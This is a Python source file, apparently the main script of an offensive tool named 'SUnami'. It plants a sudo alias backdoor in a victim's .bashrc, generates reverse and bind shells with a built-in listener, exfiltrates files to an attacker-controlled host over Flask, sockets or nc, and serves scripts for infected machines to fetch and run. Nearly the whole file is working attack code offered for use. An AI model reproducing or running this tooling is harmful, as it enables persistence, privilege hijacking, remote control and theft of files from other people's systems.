148 lines
4.5 KiB
Python
148 lines
4.5 KiB
Python
import lib.payloads as payloads
|
|
import lib.parsing as parsing
|
|
import lib.banner
|
|
import socket
|
|
import os
|
|
import sys
|
|
import time
|
|
print(lib.banner.subanner)
|
|
args=parsing.parser()
|
|
result=""
|
|
escapedres=""
|
|
|
|
def routeres(comm, local):
|
|
if local:
|
|
localexec(comm)
|
|
else:
|
|
display(comm)
|
|
|
|
def display(comm):
|
|
result=f"alias sudo=\"sudo {comm} sudo\";"
|
|
pastetemp=f"paste the following into the infected sudoers .bashrc file:\n\t{result}"
|
|
escapedres=result.replace("\"","\\\"")
|
|
runtemp=f"or run the following command:\n\techo \"{escapedres}\" >> $HOME/.bashrc\n"
|
|
print(pastetemp)
|
|
print(runtemp)
|
|
|
|
def localexec(comm):
|
|
print("works")
|
|
result=f"alias sudo=\"sudo {comm} sudo\";"
|
|
home=os.environ["HOME"]
|
|
with open(f"{home}/.bashrc","a") as rc:
|
|
rc.write(f"\n{result}")
|
|
|
|
def genshell(ip, port, protocol, shelltype, shell):
|
|
if shelltype == "bind":
|
|
return payloads.func_dict2[shell](ip, port, protocol)
|
|
else:
|
|
return payloads.func_dict[shell](ip, port, protocol)
|
|
|
|
if args.command == "genshell":
|
|
cmd=""
|
|
comm=genshell(args.ip, args.port, args.protocol, args.shelltype, args.shell)
|
|
routeres(comm,args.local)
|
|
if args.listen:
|
|
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
|
|
s.bind((args.ip, int(args.port)))
|
|
s.listen(1)
|
|
conn, addr = s.accept()
|
|
with conn:
|
|
while True:
|
|
data = conn.recv(1024).decode("utf-8")
|
|
sys.stdout.write(data)
|
|
cmd=input()
|
|
cmd+="\n"
|
|
conn.send(cmd.encode("utf-8"))
|
|
time.sleep(1)
|
|
sys.stdout.write("\033[A" + data.split("\n")[-1])
|
|
elif args.shelltype == "bind":
|
|
print(f"on your machine run the following:\n\tnc {args.ip} {args.port}")
|
|
else:
|
|
print(f"on your machine run the following:\n\tnc -lnvp {args.port}")
|
|
|
|
if args.command == "exfilfile":
|
|
if args.method == "postflask":
|
|
comm=payloads.Exfil.pflask(args.ip, args.port, args.file)
|
|
routeres(comm, args.local)
|
|
from flask import Flask, request
|
|
app = Flask(__name__)
|
|
@app.route("/up",methods=["POST"])
|
|
def upl():
|
|
if request.files["file"]:
|
|
print(request.files["file"].read())
|
|
return ""
|
|
if __name__ == "__main__":
|
|
app.run(host=args.ip, port=int(args.port))
|
|
|
|
else:
|
|
comm=payloads.Exfil.socket(args.ip, args.port, args.file)
|
|
routeres(comm,args.local)
|
|
|
|
if args.method == "pysocket":
|
|
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
|
|
s.bind((args.ip, int(args.port)))
|
|
s.listen()
|
|
conn, addr = s.accept()
|
|
with conn:
|
|
while True:
|
|
data = conn.recv(1024)
|
|
if data:
|
|
print(data)
|
|
break
|
|
|
|
if args.method == "nc":
|
|
print(f"on your machine run the following:\n\tnc -lnvp {args.port}")
|
|
|
|
if args.command == "rfs":
|
|
comm=payloads.RFS.run(args.ip, args.port, args.schema)
|
|
routeres(comm,args.local)
|
|
from flask import Flask, request, render_template
|
|
app = Flask(__name__)
|
|
@app.route("/rfs",methods=["GET"])
|
|
def rfs(rfvs=args.vars):
|
|
if rfvs:
|
|
rfsvars={v.split(":",1)[0]:v.split(":",1)[1] for v in rfvs}
|
|
else:
|
|
rfsvars=""
|
|
return render_template(os.path.join("rfs",args.file),rfsvars=rfsvars)
|
|
@app.route("/l",methods=["POST"])
|
|
def listen():
|
|
for key in request.form.keys():
|
|
print(f"{key}:{request.form[key]}")
|
|
return ""
|
|
if __name__ == "__main__":
|
|
app.run(host=args.ip, port=int(args.port))
|
|
|
|
if args.command == "help":
|
|
print("""
|
|
SUnami
|
|
|
|
help outputs this page
|
|
|
|
genshell generates the shell to be edited in the bashrc file as an alias
|
|
--ip ip to connect to
|
|
--port port to connect to
|
|
--shelltype type of shell to use (reverse, bind) - default is reverse
|
|
--shell type of shell to generate - default is bash
|
|
reverse bash, nc, nce
|
|
bind nc
|
|
-protocol type of protocol, will not affect most shells (tcp, udp) - default is tcp
|
|
-listen will automatically run a listener after outputting the shell
|
|
usage: sunami.py genshell [-h] [--ip IP] [--port PORT] [--shelltype SHELLTYPE] [--shell SHELL] [-protocol PROTOCOL] [-listen]
|
|
|
|
exfilfile exfiltrates files using several methods
|
|
--file file to exfiltrate
|
|
--method method to use (postflask, nc, pysocket)
|
|
--ip ip to send to
|
|
--port port to send to
|
|
usage: sunami.py exfilfile [-h] [--file FILE] [--method {postflask,nc,pysocket}] [--ip IP] [--port PORT]
|
|
|
|
rfs runs flask server serving your sh files to run from the attacker machine
|
|
--ip ip to run server on
|
|
--port port to run server on
|
|
--file file to run on infected machine
|
|
--vars <key>:<value> - sets variables in the selected script using jinja2 template syntax - default is no variables
|
|
--schema schema to use (http, https) - default http
|
|
useage: sunami.py rfs [-h] --ip IP --port PORT --file FILE [--vars VARS [VARS ...]] [--schema SCHEMA]
|
|
""")
|